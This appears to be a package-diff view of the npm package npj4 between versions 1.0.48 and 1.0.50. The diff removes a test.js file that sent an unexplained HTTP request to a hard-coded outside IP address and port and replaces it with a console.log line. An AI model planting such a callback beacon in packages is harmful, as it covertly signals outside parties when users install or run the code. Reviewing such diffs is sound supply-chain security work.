npj4 1.0.48 → 1.0.50

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/test.js +1 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "npj4",
3
- "version": "1.0.48",
3
+ "version": "1.0.50",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "amis-widgets": [
package/test.js CHANGED
@@ -1,3 +1 @@
1
- x = new XMLHttpRequest;
2
- x.open("GET", "http://47.99.124.12:1234");
3
- x.send()
1
+ console.log(1111111111)